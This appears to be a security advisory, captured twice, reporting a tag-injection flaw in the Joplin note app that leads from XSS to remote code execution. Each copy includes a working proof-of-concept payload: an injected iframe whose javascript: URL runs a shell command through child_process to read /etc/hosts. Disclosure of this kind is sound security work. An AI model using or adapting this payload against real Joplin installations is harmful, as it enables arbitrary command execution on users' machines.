Summary
There is a parsing error that allows for arbitrary tag injection which leads to RCE.
Details
Joplin fails to take into account that "<" followed by a non letter character will not be considered html.
As such it is possible to do an XSS by putting an "illegal" tag within a tag.
PoC
Paste this into any notes, the POC will read the /etc/hosts file.
<div>
<.a<iframe src=javascript:try{top.alert(parent.parent.require('child_process').execSync('echo\x20$(cat\x20/etc/hosts)'))}catch(e){top.alert(e)} >
Impact
This leads to RCE
febou92 Reporter
Summary
There is a parsing error that allows for arbitrary tag injection which leads to RCE.
Details
Joplin fails to take into account that "<" followed by a non letter character will not be considered html.
As such it is possible to do an XSS by putting an "illegal" tag within a tag.
PoC
Paste this into any notes, the POC will read the /etc/hosts file.
<div><.a<iframe src=javascript:try{top.alert(parent.parent.require('child_process').execSync('echo\x20$(cat\x20/etc/hosts)'))}catch(e){top.alert(e)} >Impact
This leads to RCE